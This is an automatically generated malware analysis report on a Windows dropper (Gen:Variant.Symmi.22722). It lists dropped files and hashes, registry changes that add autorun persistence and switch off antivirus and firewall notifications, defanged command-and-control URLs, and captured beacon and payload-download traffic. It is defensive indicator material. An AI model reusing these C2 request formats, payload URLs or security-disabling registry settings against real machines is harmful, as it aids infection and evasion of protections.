Gen.Variant.Symmi.22722_4840427168

by malwarelabrobot on March 7th, 2015 in Malware Descriptions.

Susp_Dropper (Kaspersky), Gen:Variant.Symmi.22722 (B) (Emsisoft), Gen:Variant.Symmi.22722 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 4840427168a9965e4dd57695f4eb5f34
SHA1: 0ef4dfd6895938be97f42886e003869bb777c5fd
SHA256: 8645d5705505416572d9393acca274f5d6332a3636621489d2f44ed92b290203
SSDeep: 12288:9qq56aNzthKz69e1NDxNlq99NcMWf8uqlTn8lZQTgqjFsHi0:9dppbKz6WNkLUeJ8lZQT5
Size: 847360 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: PCPerformer
Created at: 2014-04-16 00:27:00
Analyzed on: WindowsXP SP3 32-bit


Summary:

Malware. Malware, short for malicious software, is any software used to disrupt computer operation, gather sensitive information, or gain access to private computer systems.

Payload

No specific payload has been found.

Process activity

The Malware creates the following process(es):

win32plot2.exe:1396
jrhwdmjgu925ubg.exe:1776
jrhwdmjgu925ubg.exe:3876
jrhwdmjgunjvubg.exe:2660
%original file name%.exe:1144
unzip.exe:3760
ckxjtyt.exe:1964
ckxjtyt.exe:2836
jrhwdmjgszdmubgkotiny.exe:2128
jrhwdmjgt1byubg.exe:2588
jrhwdmjgubkfubg.exe:3640
pogwoihcz.exe:3524
pogwoihcz.exe:2856

The Malware injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process jrhwdmjgunjvubg.exe:2660 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\bzntcdorshxs\tst (10 bytes)

The process %original file name%.exe:1144 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\jrhwdmjgszdmubgkotiny.exe (3920 bytes)
%System%\bzntcdorshxs\tst (10 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\jrhwdmjgszdmubgkotiny.exe (0 bytes)

The process unzip.exe:3760 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\binaries_burst4\win32\win32plot2.exe (673 bytes)
%System%\binaries_burst4\win64\win64burst2.exe (673 bytes)
%System%\binaries_burst4\win32\win32burst2.exe (673 bytes)
%System%\binaries_burst4\win64\win64plot2.exe (673 bytes)

The process ckxjtyt.exe:1964 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\bzntcdorshxs\tst (10 bytes)

The process ckxjtyt.exe:2836 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\binaries_burst4.zip (10700 bytes)
%System%\bzntcdorshxs\run (10 bytes)
%System%\bzntcdorshxs\rng (44 bytes)
%System%\unzip.exe (7100 bytes)
%System%\bzntcdorshxs\cfg (494 bytes)
%System%\pogwoihcz.exe (5873 bytes)
%WinDir%\Temp\jrhwdmjgu925ubg.exe (35 bytes)
%System%\bzntcdorshxs\tst (10 bytes)
%WinDir%\Temp\jrhwdmjgt1byubg.exe (35 bytes)
%WinDir%\Temp\jrhwdmjgubkfubg.exe (2820 bytes)
%WinDir%\Temp\jrhwdmjgunjvubg.exe (5873 bytes)

The Malware deletes the following file(s):

%WinDir%\Temp\jrhwdmjgt1byubg.exe (0 bytes)
%WinDir%\Temp\jrhwdmjgubkfubg.exe (0 bytes)
%WinDir%\Temp\jrhwdmjgu925ubg.exe (0 bytes)

The process jrhwdmjgszdmubgkotiny.exe:2128 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\bzntcdorshxs\etc (10 bytes)
%System%\ckxjtyt.exe (5873 bytes)
%System%\drivers\etc\hosts (22 bytes)
%System%\bzntcdorshxs\tst (10 bytes)

The Malware deletes the following file(s):

%System%\drivers\etc\hosts (0 bytes)

The process pogwoihcz.exe:3524 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\bzntcdorshxs\tst (10 bytes)

The process pogwoihcz.exe:2856 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%System%\bzntcdorshxs\tst (10 bytes)

Registry activity

The process win32plot2.exe:1396 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"

[HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"

The process jrhwdmjgu925ubg.exe:1776 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 9C E5 B6 99 02 49 CB AA D2 50 26 B3 C6 6D 3C"

The process jrhwdmjgu925ubg.exe:3876 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 52 33 C4 75 6A 43 E9 D7 74 60 B9 62 2B 23 A5"

The process jrhwdmjgunjvubg.exe:2660 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C7 B9 84 BF D5 1C C7 54 8E 5E 10 DE 9E 4E 24 BD"

The process unzip.exe:3760 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 E4 47 D5 42 0D 90 00 56 5C 12 74 E1 87 85 4D"

The process ckxjtyt.exe:2836 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 6C AC 11 85 8F BF D5 2A 15 20 D5 32 A8 01 49"

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
"FirewallDisableNotify" = "1"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

The process jrhwdmjgszdmubgkotiny.exe:2128 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "16 73 E8 5C DA 03 01 7E 41 DC 1A E3 19 87 2B 55"

To automatically run itself each time Windows is booted, the Malware adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AutoConnect Engine WebClient Web Procedure Trap" = "%System%\ckxjtyt.exe"

The process jrhwdmjgt1byubg.exe:2588 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6C 8A 05 E4 23 AA 61 68 83 D8 98 CE C4 59 87 C7"

The process jrhwdmjgubkfubg.exe:3640 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"

[HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoLowDiscSpaceChecks" = "1"

Dropped PE files

MD5 File path
476f447617f65eebf35c52d4fd3b3188 c:\WINDOWS\Temp\jrhwdmjgu925ubg.exe
fecf803f7d84d4cfa81277298574d6e6 c:\WINDOWS\system32\unzip.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 667158 667648 4.71459 0d37ea21d46fd457efcdcbc414af23e6
.rdata 671744 53434 53760 3.65008 ebfa7ac2aa75c0bd35892129695abd28
.data 729088 158844 124928 5.50119 16d3baf792c669359cc24b48d18a27cd

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://melbourneit.hotkeysparking.com/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01
hxxp://requireneither.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 208.91.197.241
hxxp://decemberknew.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 98.139.135.198
hxxp://decemberknew.net/forum/search.php?method=all&flag&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 98.139.135.198
hxxp://www.geobytes.com/IpLocator.htm 69.16.219.22
hxxp://decemberknew.net/forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU E5620 @ 2.40GHz (2400 MHz)&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=8083&slots=0&spm=0&adm=1&x64=0&mr=0 98.139.135.198
hxxp://decemberknew.net/forum/search.php?method=setvar&key=connected&value=8083&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=8083&slots=0&spm=0&adm=1&x64=0&mr=0 98.139.135.198
hxxp://decemberknew.net/dep/unzip.exe 98.139.135.198
hxxp://decemberknew.net/dep/binaries_burst4.zip 98.139.135.198
hxxp://throughcountry.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 208.91.197.241
hxxp://gentlefriend.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 208.91.197.241
hxxp://picturebecome.net/dep/binaries_burst4.zip 98.139.135.198
hxxp://rememberpaint.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 208.91.197.241
hxxp://mightglossary.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 8.5.1.16
hxxp://picturebecome.net/dep/unzip.exe 98.139.135.198
hxxp://glasshealth.net/forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 208.91.197.241
www.showmyip.com 212.117.175.194


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: rememberpaint.net


HTTP/1.1 200 OK
Date: Fri, 06 Mar 2015 17:38:25 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2607
Keep-Alive: timeout=5, max=126
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://rememberpaint.net/?fp=1DRuJgDNJXkEVD5%2
FiGni9v3toTy0wy2ebXlOhRNOtS5Udxlo0ID4PfPk5WN9s2E3tmehVOgDmzNCPKCXAdTI%
2BQ==&prvtof=0G4hRm1xnmN71Auaziei4xYFwShH7oid2z0uKbb7hLo=&poru=J
AEITCvT3ATSD95YCokaigCHAqcD57pq+k9Ssvb0G8WAxKobtn7HH3tsEsDhrrE1c9awH
7YyTzET3nczMf6YUm/o067AT7oDEfv6njBn/HKsugTFg7xvoMY3V/nJNwQf&cifr
=1&method=validate&mode=sox&v=028&sox=3b93ce01";.../*..-->..<scr
ipt type="text/javascript">...<!--...dimensionUpdated = 0;...fun
ction applyFrameKiller()...{....if(window.top != self)....{.....cHeigh
t = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//N
on-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;.....
} else if( document.documentElement && ( document.documentElement.clie
ntWidth || document.documentElement.clientHeight )  ) {.....//IE 6  in
 'standards compliant mode'.....cHeight = document.documentElement.cli
entHeight;.....dimensionUpdated = 1;.....} else if( document.body && (
 document.body.clientWidth || document.body.clientHeight ) ) {.....//I
E 4 compatible.....cHeight = document.body.clientHeight;.....dimension
Updated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1)
.....{......window.top.location = "hXXp://rememberpaint.net/?fp=1DRuJg
DNJXkEVD5/iGni9v3toTy0wy2ebXlOhRNOtS5Udxlo0ID4PfPk5WN9s2E3tmehVOgDmz
NCPKCXAdTI+Q==&prvtof=IT1nchMsaM0WXpFNgClhp0C+LPKdVwt2V3XT7a%2
BsH1A=&poru=k4WuWLM/Nm3RxM1tSPdirQmbJGlibMJcKTIY8iBqlXnLr7dZfDXjfN
zlDhmJd2PPlSK2W7FCLoHuF8GGSuzFF31sq8y0t92TOXSAtdSLEqfH6J1f4j11GEMW
<<< skipped >>>


GET /forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU E5620 @ 2.40GHz (2400 MHz)&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=8083&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: decemberknew.net


HTTP/1.0 200 OK
Date: Fri, 06 Mar 2015 17:39:04 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: ATS/5.0.1
.............



GET /forum/search.php?method=setvar&key=connected&value=8083&mode=sox&v=028&sox=3b93ce01&lport=1&rsid=8083&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: decemberknew.net


HTTP/1.0 200 OK
Date: Fri, 06 Mar 2015 17:39:05 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: ATS/5.0.1
.............



GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: decemberknew.net


HTTP/1.0 200 OK
Date: Fri, 06 Mar 2015 17:39:03 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: ATS/5.0.1
304....U......(.decemberknew.net..........5......o..fFi..8.....b..&.).
h.7..i..ng?H..........f..Ht.BH..<M..$.L..l..Z0........W*....... >
;@..;BY..hs ....f..,..uO@...*.N....J.........\.P.p_..OXP....&.t.Z.w...
.`..I=!n....W..~W..T.b..!..#._..lD.*...`.K..O......l.....Y...[.%..>
/...W..9..?.X...=....B..?..b. .......4...053..............g..p........
.!;..#....(.p..K3.;.Z......:-..D...........)......K$xy&.:b:ge......V.A
CV.LC...X?&...#..|#)h.v=..6...N..Z.Lvz...,r-.?o.......W.:.h.....X..A..
DB8.z. ...r ....(B...S.} ..S..aZ.>.."...V.....d...J.....*p..H /.R].
....8<........]}....!.vf,.=...0h..b.o.<.D..{.....-y....N.......Z
[email protected].._-.Nr...}R...d....i...Vb..*..=.......1......n.M.o..
..?{.(..*.......L.3.../Y.....t...["0.....z....G.Z...I6....o..~........
..u.a).k.. #u..,k.j0t..ah.JLsg..h...........}|.N..5`..O.<.(.".;.k.q
...b..X..g.0...>...f...Nl.N.jU|.n...f...Js..0{p3..3.%..NlZp..>.*
.p(...{I.~.APTnE.!.r4...3 ..]K.Y?....G-...*..K5L....n]...W...p..'&....
_.iE[./L..1.b.:.!..*i..C)....L...IJ&k..#O.......p...;...(b..0/...T.lm(
9.I....\\\..$_......E....k'...!..B....C..........Bc...{....Q?./OJ.jRd.
.{....j.`..].W...t...2....../5%......#[.g..WT.M}.9..y...t...GFF.!:.TA.
o.*..X.<.`.]...._.....9..,4UQ..-...tA.N*"..P.....l......(N6<~..r
...<T[_V(.-..J.M....&v..
<<< skipped >>>


GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: gentlefriend.net


HTTP/1.1 200 OK
Date: Fri, 06 Mar 2015 17:38:10 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2599
Keep-Alive: timeout=5, max=123
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://gentlefriend.net/?fp=3nB+Gww8ttmsWXm0
BY1EdeTmO3Ulz67JmvcOUDVf4eYrovlWueybau49NakK4xLYrEVUQbqJcKdH0CbuvXfg5g
==&prvtof=zhRgz1xuFRpHFAgLQv0feYD/DBX/Ng1JO565gWSBtZI=&poru=
N8dRHeffnczSYRX4s7t//tDxbrorndTL1Hfxni3GMu9SpXTX7COifFNjVMvoIw4JEk
RMkseCQXQwNz+8QJdhKj05mguiYHfqhLUf4gHPRqAn5eRP5v5DJ9GOnHJH/IEo&cif
r=1&method=validate&mode=sox&v=028&sox=3b93ce01";.../*..-->..<sc
ript type="text/javascript">...<!--...dimensionUpdated = 0;...fu
nction applyFrameKiller()...{....if(window.top != self)....{.....cHeig
ht = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//
Non-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;....
.} else if( document.documentElement && ( document.documentElement.cli
entWidth || document.documentElement.clientHeight )  ) {.....//IE 6  i
n 'standards compliant mode'.....cHeight = document.documentElement.cl
ientHeight;.....dimensionUpdated = 1;.....} else if( document.body && 
( document.body.clientWidth || document.body.clientHeight ) ) {.....//
IE 4 compatible.....cHeight = document.body.clientHeight;.....dimensio
nUpdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1
).....{......window.top.location = "hXXp://gentlefriend.net/?fp=3nB+
Gww8ttmsWXm0BY1EdeTmO3Ulz67JmvcOUDVf4eYrovlWueybau49NakK4xLYrEVUQbqJcK
dH0CbuvXfg5g==&prvtof=XtjO2X71dZ5T2BDPJWLoPT7k8Mx5PXGAeq+J3jPNgx
U=&poru=h2VspZVYRcX61rDfjpvXg4PszgFGhY31jvEvToI6myr+/qWzpARQ4n%2
By1Rdv0gzizQizReBV4w5LK2vhGfE840xM/AjnZx7n5lEVhUfW2/InmjHAedL0
<<< skipped >>>


GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: requireneither.net


HTTP/1.1 200 OK
Date: Fri, 06 Mar 2015 17:38:10 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2601
Keep-Alive: timeout=5, max=111
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://requireneither.net/?fp=axCPzesR7uBwtTqO
nmcl9F6GeD2ZopDbYpEVkJd07DDm0lAUyJuIxlLRzzCEJlVCjx6s55CadqZFeRomVEAErQ
==&prvtof=DtovJQCpYRpf99MUWzBwaQI1fo6mS7UMSgVgFRORcFY=&poru=J1gF
iuzz+h8I6C8md3nr6FsCHGohqf81OdafFArL0i+6O4BDZQB/pReR4mHRPRCqKx%2
F7vBiRKyRlbQQLuJArpae1V3+ZgdHNLZLXnd1iVcCyXACaJj1xabfHGLFvaMdn&cifr=
1&method=validate&mode=sox&v=028&sox=3b93ce01";.../*..-->..<scri
pt type="text/javascript">...<!--...dimensionUpdated = 0;...func
tion applyFrameKiller()...{....if(window.top != self)....{.....cHeight
 = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//No
n-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;.....}
 else if( document.documentElement && ( document.documentElement.clien
tWidth || document.documentElement.clientHeight )  ) {.....//IE 6  in 
'standards compliant mode'.....cHeight = document.documentElement.clie
ntHeight;.....dimensionUpdated = 1;.....} else if( document.body && ( 
document.body.clientWidth || document.body.clientHeight ) ) {.....//IE
 4 compatible.....cHeight = document.body.clientHeight;.....dimensionU
pdated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1).
....{......window.top.location = "hXXp://requireneither.net/?fp=axCPze
sR7uBwtTqOnmcl9F6GeD2ZopDbYpEVkJd07DDm0lAUyJuIxlLRzzCEJlVCjx6s55CadqZF
eRomVEAErQ==&prvtof=cIgUFdj0K5P8mVSR9AkhcEl2A4Gj/iGY9C53s3q4RCI%
3D&poru=xZkbqYo/emU/zwMkcAtPW1mOH0T7Sx4x3sXsGyevMKJglGwvtrb99Xv7Wb
O3UfbrO8u/YApPSNIVR6oacHv69g+9JRMagR37GsZAjICaculwljRRugrFlsR5
<<< skipped >>>


relayrqst




ID..




3b93ce01..




BEGIN



GET /dep/unzip.exe HTTP/1.0
Accept: */*
Connection: close
Host: picturebecome.net


HTTP/1.0 200 OK
Date: Fri, 06 Mar 2015 17:39:05 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 20 May 2014 22:57:37 GMT
Accept-Ranges: bytes
Content-Length: 164864
Content-Type: application/octet-stream
Age: 0
Server: ATS/5.0.1
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......B
[email protected]...........
................ .....................................................
......................................................................
...........................text...$X.......Z..................`..`.dat
a........p.......^[email protected]..............................
.......idata...............`[email protected]..
............@.........................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U.......$........C..h.....
1.]...U.......$........C..H.....1.]...U......U...$..d.C...]..v...'....
U......U...$..H.C...]..v...'....U..S..$..$..@..}O.......C....$.pB.....
B..M..E......L$..T$..U..T$..D$..pB...K....qB...t^..qB...<.C...t..D$
..Z...$..K....<.C....t....qB..\$..J0..$..K....<.C....t....qB..\$
..JP..$.{K...fK.....qB.....C...4K.....pB......pB...$.\$..L$..........J
....$..N....&....U......]..M.1..u.1.....=..........=....sg=....t....u.
.]...]....D$.......$......J.....t"..t...$......&......'...........
<<< skipped >>>


GET /dep/binaries_burst4.zip HTTP/1.0
Accept: */*
Connection: close
Host: picturebecome.net


HTTP/1.0 200 OK
Date: Fri, 06 Mar 2015 17:39:06 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 06 Mar 2015 17:25:24 GMT
Accept-Ranges: bytes
Content-Length: 321783
Content-Type: application/zip
Age: 0
Server: ATS/5.0.1
PK..........fF................binaries_burst4/..1 ...~2...PK..........
....PK..........fF................binaries_burst4/win64/..1 ...~2...PK
..............PK........p.fFTn..JD......$...binaries_burst4/win64/win6
4plot2.exe..1 ...~2...Z../....?|].ex.z#a.k.}o}.#<\_..2%....(..~....
.n`.|b.....M..w..v...;...5......;...f6!..^r.TRTu ...S4..F.#.h!J...z...
..@[email protected]..)..D..C.}......8..-$..-.wy..{'....Wh.....e~hK....Wu.9odo.
G...O......f...e{.....|A....c......Q..6.i*...dJ$.3.o.8....,.....#_....
.....lg.p..p*h.D-..%9?.Gf...........8...?..=c.l'..1.K...C.V.......B..I
{.....aG..55O{.$!..,...........Y~..............X.00Jxc................
.z.%.(:M...R.....7......1..v~j.......`,@...wj.....)..J....4..T...%D...
.z.....w.AP*!.....{....a.NE=.h.....C.......!..wC....R..lQX.L.G....o4..
....'.t7QYOE.x{..y&..{[email protected]..=.....J}.KHK.lG.
.(........P ..=.a...>.p!DR..u.. ....GD.E.sY....1..D...d.T.....=.t..
"c..P....L..Z.h.k..U..<5.`..D.Rv..w.A{.`?r............ ..&...*U-...
..u.Z~...1..U...X. .@M..,...x../^B...^@.QyV.....X.-a.gc..A.Z)P$h.%....
....S.:.%n.2.]...7T....g..o.s'.^.]O.W..c..17.e...:.........2IH>\Y..
j........M<.,\...I.'.S..j\....%.B'x......0...]Go..2/....._m.D...G~.
..5.....Z ..!,&...<.3}..U?..{1..E%[email protected]>....e<.X....Y=...,
."..e~.....Rx.]..[.{..[.*..<.7....J...U.._......`.... .bK..I..Bc...
[email protected].....(.........SF..jv.....q.Q7....3.%.......T......-a..Pwon
..y.^..u..'..8.,.....h....n...ylj ..R.=.....|.......U....t.*..K.J0....
....g...1Z.Q.........R..Mh.'......F......`=.....e.....mn-.2`z.k9'.
<<< skipped >>>


GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: glasshealth.net


HTTP/1.1 200 OK
Date: Fri, 06 Mar 2015 17:38:11 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 2611
Keep-Alive: timeout=5, max=127
Connection: close
Content-Type: text/html; charset=UTF-8
<!--...top.location="hXXp://glasshealth.net/?fp=gflAhs8IcUd97NIiayK
Q7UQN9dlG4+w1rhgSgPDY2wI1o/jF3QTSUXEUvYwZaD8eIVaYzJQ4Lnkr85gq8zHv%
2Fg==&prvtof=67h3zsyWRM96HzMguVIw2NdqJ+sg0xsg33t5I9z/LVc=&po
ru=9L/nBj7txLcevEXVP1cCHBo4ptAm7czfS3iC3M3yaXiYxFUyvUodJ4XBJUStdjN4J
Axtw9qGwHb1c7suSo4arypf1Xv3S/4Ku9T0pQXvVchj6kR5kdiaxr8TXn5KM2Mx&cifr
=1&method=validate&mode=sox&v=028&sox=3b93ce01";.../*..-->..<scr
ipt type="text/javascript">...<!--...dimensionUpdated = 0;...fun
ction applyFrameKiller()...{....if(window.top != self)....{.....cHeigh
t = 0;.....if( typeof( window.innerHeight ) != 'undefined' ) {.....//N
on-IE.....cHeight = window.innerHeight;.....dimensionUpdated = 1;.....
} else if( document.documentElement && ( document.documentElement.clie
ntWidth || document.documentElement.clientHeight )  ) {.....//IE 6  in
 'standards compliant mode'.....cHeight = document.documentElement.cli
entHeight;.....dimensionUpdated = 1;.....} else if( document.body && (
 document.body.clientWidth || document.body.clientHeight ) ) {.....//I
E 4 compatible.....cHeight = document.body.clientHeight;.....dimension
Updated = 1;.....}.....if( cHeight <= 250 && dimensionUpdated == 1)
.....{......window.top.location = "hXXp://glasshealth.net/?fp=gflAhs8I
cUd97NIiayKQ7UQN9dlG4+w1rhgSgPDY2wI1o/jF3QTSUXEUvYwZaD8eIVaYzJQ4Ln
kr85gq8zHv/g==&prvtof=n+scX8txUIS8AicO8bYmmTai1kexrb2ax5CYJ+
aQ0SU=&poru=ZfmI6g7Ocz4B2/kwYdn7QBUrOzmbBFIsa/tBlE9Umk/T+gLS
wOcUOeOU9JeEHoQOHHVqq7emploCdGlO4+Bejn8FmEfbIk4NvkonDzLYANLGP0zR
<<< skipped >>>


GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b93ce01 HTTP/1.0
Accept: */*
Connection: close
Host: mightglossary.net


HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 7849
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
p3p: CP="CAO PSA OUR"
Set-Cookie: SessionID=1671ce8f-86e8-4303-a81c-b7e9e64fca1e; path=/
Set-Cookie: VisitorID=d8fe5a56-a3a0-4e17-bb31-7f5dc4744215&Exp=3/6/2018 9:38:11 AM; expires=Tue, 06-Mar-2018 17:38:11 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 06 Mar 2015 17:38:10 GMT
Connection: close
<!doctype html>..<html>.....<head>...<meta charse
t="utf-8"/>...<meta http-equiv="X-UA-Compatible" content="IE=edg
e,chrome=1"/>...<meta name="viewport" content="width=device-widt
h, initial-scale=1"/>..    ..<title>Mightglossary.net</tit
le>..<meta name="keywords" content=" mightglossary.net" />..&
lt;meta name="description" content="" />..<script src='hXXp://co
de.jquery.com/jquery-latest.min.js' type='text/javascript'></scr
ipt>..<script language='JavaScript' src='/js/standard.js?rte=1&t
m=2&dn=mightglossary.net&tid=1020'></script>..<meta name='
google' value='notranslate' />..<script type='text/javascript' l
anguage='JavaScript' src='/js/google_caf.js?rte=1&tm=2&dn=mightglossar
y.net&tid=1020'></script>..<script type='text/javascript' 
language='JavaScript' src='hXXp://VVV.google.com/adsense/domains/caf.j
s'></script>..<script type='text/javascript'>..var page
Options =..{..    'domainRegistrant' : 'as-drid-2864613873876811',..  
  'relatedSearchBaseUrl': 'hXXp://mightglossary.net/?ac=2&slt=8&slr=1&
lpt=2',..    'resultsPageBaseUrl': 'hXXp://mightglossary.net/?ac=2&slt
=8&slr=1&lpt=2',..    'pageLoadedCallback': google_callback,..    'pub
Id': 'dp-demandmedia02',..    'channel': '000001',..    'terms': '',..
    'optimizeTerms': true,..    'adtest': 'off',..    'hl': ''..};..va
r searchboxBlock =..{..    'container': 'searchbox',..    'type': 'sea
rchbox',..    'width': '300px',..    'widthSearchButton': 70,..   
<<< skipped >>>


